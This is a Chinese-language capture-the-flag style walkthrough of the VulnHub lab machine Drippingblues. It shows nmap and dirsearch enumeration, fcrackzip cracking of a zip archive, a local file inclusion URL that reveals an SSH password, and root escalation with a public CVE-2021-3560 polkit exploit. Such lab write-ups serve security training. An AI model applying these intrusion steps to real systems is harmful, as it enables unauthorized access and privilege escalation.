vulnhub实战:DRIPPING BLUES: 1
1.安装部署
下载链接:
https://download.vulnhub.com/drippingblues/drippingblues.ova
下载之后使用VMware打开.ova文件,打开结果,设置为Net模式
攻击机:kail
2.信息收集
1.扫描此IP段中存活的靶机IP
arp-scan -l
找到靶机ip:192.168.241.135
2.端口扫描
nmap -A -p- -T4 192.168.241.135
发现开放了21端口ftp服务,22端口ssh, 80端口web服务
利用21端口 ftp服务:
发现respectmydrip.zip,发现解压要密码,于是爆破一波
Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统,在kali的最新版本(2020.2)中,已经默认安装了fcrackzip,而旧版本的kali是没有默认安装的,需要执行命令:
apt install fcrackzip
来安装
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
解压后有一个 respectmydrip.txt,内容是just focus on "drip"
还有一个secret.zip,密码爆不出来
于是利用web服务访问该地址:
发现:这么一段话
漂流蓝调又被黑客攻击了,所以它现在被称为滴水蓝D哈哈哈通过
特拉维斯·斯科特和图格
3.目录探测
使用dirsearch进行目录探测:
python3 dirsearch.py -u http://192.168.241.135/
发现有robots.txt ,打开发现
于是访问dripisreal.txt
你好亲爱的黑客,
选择这首歌词:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
数一数n个单词,并排放置,然后md5求和
例如,md5你好你好
这是ssh的密码
但是这网址打不开于是放弃了,
直接访问/etc/dripispowerful.html
,结果打不开,看了大佬们的wp,发现此处应该用文件包含
view-source:http://192.168.241.135/index.php?drip=/etc/dripispowerful.html
查看源码:得到密码
3.使用ssh远程登录
ssh [email protected]
imdrippinbiatch
登录成功,查看文件,发现第一个flag,
查看其他文件和权限都没有什么发现可利用的地方,于是想到提权
4.提权
ps -ef //查看进程命令
ps axu //同上
发现 polkitd,
polkitd介绍
- polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。
- Polkit 在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和 sudo 等程序不同,Polkit 并没有赋予进程完全的 root 权限,而是通过一个集中的策略系统进行更精细的授权。
- Polkit 定义出一系列操作,例如运行 GParted, 并将用户按照群组或用户名进行划分,例如 wheel 群组用户。然后定义每个操作是否可以由某些用户执行,执行操作前是否需要一些额外的确认,例如通过输入密码确认用户是不是属于某个群组。
在GitHub上找到提权漏洞
https://github.com/Almorabea/Polkit-exploit
直接下载CVE-2021-3560.py,复制到靶机中,(因为有账号密码可以直接登录)
python3 CVE-2021-3560.py
查看权限为root,最终在根目录下root路径中找到最后一个flag
5.总结
本次知识点:
- ftp服务
- ssh登录
- Fcrackzip工具爆破
- 文件包含
- CVE-2021-3560.py 漏洞提权